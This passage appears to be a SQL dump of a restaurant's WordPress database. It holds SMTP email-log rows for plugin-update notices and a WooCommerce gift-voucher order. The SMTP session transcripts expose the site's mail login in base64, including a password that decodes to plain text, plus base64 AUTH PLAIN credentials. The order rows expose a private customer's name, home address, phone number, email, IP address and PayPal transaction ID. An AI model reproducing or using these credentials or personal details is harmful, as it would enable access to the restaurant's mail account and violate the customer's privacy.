inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL version 4.0.2=0A=0A=0AIf you experience any issues or need=\r\n support, the volunteers in the WordPress.org support forums may be able=\r\n to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Tea=\r\nm\r\n.\r\n250 OK id=1kiGKN-0002k1-Pi\r\n'),(22756,1255,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22757,1255,'success',''),(22758,1255,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22759,1255,'to_header','webmaster@baldisserri.com'),(22760,1255,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22761,1255,'original_to','webmaster@baldisserri.com'),(22762,1255,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22763,1255,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.3\n- UpdraftPlus - Backup/Restore version 1.16.41\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22764,1255,'original_headers',''),(22765,1255,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 27 Nov 2020 07:23:19 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22766,1256,'solution','Not found, check status column for more info.'),(22767,1256,'success','1'),(22768,1256,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22769,1256,'to_header','webmaster@baldisserri.com'),(22770,1256,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22771,1256,'original_to','webmaster@baldisserri.com'),(22772,1256,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22773,1256,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.3\n- UpdraftPlus - Backup/Restore version 1.16.41\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22774,1256,'original_headers',''),(22775,1256,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 27 Nov 2020 07:23:21 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <9a6445ec261fe2d2e550b6abd2c5b5a0@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Fri, 27 Nov 2020 12:23:21 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL version 4.0.3=0A- UpdraftPlus - Backup/Restore version 1.1=\r\n6.41=0A=0A=0AIf you experience any issues or need support, the volunteer=\r\ns in the WordPress.org support forums may be able to help.=0Ahttps://wor=\r\ndpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kicmX-0007ZJ-GQ\r\n'),(22776,1257,'_order_key','wc_order_iYfmldeWXmIyH'),(22777,1257,'_customer_user','0'),(22778,1257,'_payment_method','paypal'),(22779,1257,'_payment_method_title','PayPal'),(22780,1257,'_customer_ip_address','2.224.175.39'),(22781,1257,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'),(22782,1257,'_created_via','checkout'),(22783,1257,'_cart_hash','cf39305b06b3661545465b1cfc99eb78'),(22784,1257,'_billing_first_name','Matteo'),(22785,1257,'_billing_last_name','Arlotti'),(22786,1257,'_billing_company','inclubitalia'),(22787,1257,'_billing_address_1','Viale Ugo Foscolo 27'),(22788,1257,'_billing_city','Rimini'),(22789,1257,'_billing_state','RN'),(22790,1257,'_billing_postcode','47921'),(22791,1257,'_billing_country','IT'),(22792,1257,'_billing_email','arlostaff@gmail.com'),(22793,1257,'_billing_phone','371 3930671'),(22794,1257,'_order_currency','EUR'),(22795,1257,'_cart_discount','0'),(22796,1257,'_cart_discount_tax','0'),(22797,1257,'_order_shipping','0.00'),(22798,1257,'_order_shipping_tax','0'),(22799,1257,'_order_tax','0'),(22800,1257,'_order_total','58.00'),(22801,1257,'_order_version','4.7.1'),(22802,1257,'_prices_include_tax','no'),(22803,1257,'_billing_address_index','Matteo Arlotti inclubitalia Viale Ugo Foscolo 27  Rimini RN 47921 IT arlostaff@gmail.com 371 3930671'),(22804,1257,'_shipping_address_index','        '),(22805,1257,'is_vat_exempt','no'),(22806,1257,'Payment type','instant'),(22807,1257,'_transaction_id','1D063507FM313301Y'),(22808,1257,'_paypal_status','completed'),(22809,1257,'PayPal Transaction Fee','2.32'),(22810,1257,'_date_paid','1606573691'),(22811,1257,'_paid_date','2020-11-28 15:28:11'),(22812,1257,'_download_permissions_granted','yes'),(22813,1257,'_recorded_sales','yes'),(22814,1257,'_recorded_coupon_usage_counts','yes'),(22815,1257,'_order_stock_reduced','yes'),(22816,1258,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22817,1258,'success',''),(22818,1258,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22819,1258,'to_header','notifiche@ristorantesolymar.it'),(22820,1258,'reply_to_header','Matteo Arlotti <arlostaff@gmail.com>'),(22821,1258,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22822,1258,'original_to','notifiche@ristorantesolymar.it'),(22823,1258,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) - 28 November 2020'),(22824,1258,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Matteo Arlotti:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1257&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #1257]</a> (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22825,1258,'original_headers','Content-Type: text/html\r\nReply-to: Matteo Arlotti <arlostaff@gmail.com>\r\n'),(22826,1258,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 09:28:11 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22827,1259,'solution','Not found, check status column for more info.'),(22828,1259,'success','1'),(22829,1259,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22830,1259,'to_header','notifiche@ristorantesolymar.it'),(22831,1259,'reply_to_header','Matteo Arlotti <arlostaff@gmail.com>'),(22832,1259,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22833,1259,'original_to','notifiche@ristorantesolymar.it'),(22834,1259,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) - 28 November 2020'),(22835,1259,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Matteo Arlotti:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1257&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #1257]</a> (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22836,1259,'original_headers','Content-Type: text/html\r\nReply-to: Matteo Arlotti <arlostaff@gmail.com>\r\n'),(22837,1259,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\nca, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-h=\r\neight: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4;=\r\n color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente<=\r\n/h1>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- End Header -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">You=\r\n=E2=80=99ve received the following order from Matteo Arlotti:</p>=0A=0A<=\r\nh2 